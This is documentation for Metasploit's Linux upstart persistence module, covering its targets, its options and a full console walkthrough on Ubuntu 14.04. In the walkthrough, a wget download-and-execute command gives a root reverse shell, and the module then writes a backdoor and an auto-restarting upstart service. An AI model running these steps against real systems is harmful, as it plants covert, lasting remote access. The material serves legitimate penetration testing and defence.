CoCalc -- init_upstart.md

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/linux/persistence/init_upstart.md
²⁵⁴¹⁵ views

Vulnerable Application

This module will create a service on the box, and mark it for auto-restart. We need enough access to write service files and potentially restart services

Targets:

CentOS 6
Fedora >= 9, < 15
Ubuntu >= 9.10, <= 14.10

Verification Steps

Exploit a box
use exploit/linux/persistence/init_sysvinit
set SESSION <session>
set PAYLOAD <payload>
set LHOST <lhost>
exploit

Options

SERVICE

The name of the service to create. If not chosen, a random one is created.

PAYLOAD_NAME

The name of the file to write with our shell if a non-cmd payload is used. If not chosen, a random one is created.

RESTART_LIMIT

The number of times to restart the service. If using a threaded payload (fetch), this is how many shells you may get. Defaults to 3

INIT_FOLDER

Init folder location. Defaults to auto. Choices are: auto which determines the folder automatically. init for /etc/init and init.d for /etc/init.d

Scenarios

Ubuntu 14.04

Initial access vector via web delivery

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 111.111.1.111
lhost => 111.111.1.111
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set srvport 8181
srvport => 8181
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4545
lport => 4545
resource (/root/.msf4/msfconsole.rc)> set URIPATH l
URIPATH => l
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Starting persistent handler(s)...
[*] Started reverse TCP handler on 111.111.1.111:4545 
[*] Using URL: http://111.111.1.111:8181/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO HvGO7GyB --no-check-certificate http://111.111.1.111:8181/l; chmod +x HvGO7GyB; ./HvGO7GyB& disown
[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > 
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[*] Meterpreter session 1 opened (111.111.1.111:4545 -> 222.222.2.222:52092) at 2025-02-16 10:52:49 -0500
[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/persistence/init_upstart 
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[msf](Jobs:2 Agents:2) exploit(linux/persistence/init_upstart) > sessions -i 1
[*] Starting interaction with 1...
(Meterpreter 1)(/home/ubuntu) > sysinfo
Computer     : Ubuntu14.04
OS           : Ubuntu 14.04 (Linux 3.13.0-24-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
(Meterpreter 1)(/home/ubuntu) > getuid
Server username: root
(Meterpreter 1)(/home/ubuntu) > background
[*] Backgrounding session 1...

Persistence

[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_upstart) > set session 1
session => 1
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_upstart) > set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
[msf](Jobs:1 Agents:1) exploit(linux/persistence/init_upstart) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[msf](Jobs:2 Agents:1) exploit(linux/persistence/init_upstart) > 
[*] Started reverse TCP handler on 111.111.1.111:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Payloads in /tmp will only last until reboot, you want to choose elsewhere.
[+] The target appears to be vulnerable. /tmp/ is writable and system is upstart based
[*] Writing backdoor to /tmp//GXhkVaF
[*] Writing '/tmp//GXhkVaF' (250 bytes) ...
[*] Writing service: /etc/init/kKxVjJjUUOVq.conf
[*] Starting service
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 222.222.2.222
[*] Meterpreter-compatible Cleaup RC file: /root/.msf4/logs/persistence/Ubuntu14.04_20250216.5324/Ubuntu14.04_20250216.5324.rc
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:53847) at 2025-02-16 10:53:24 -0500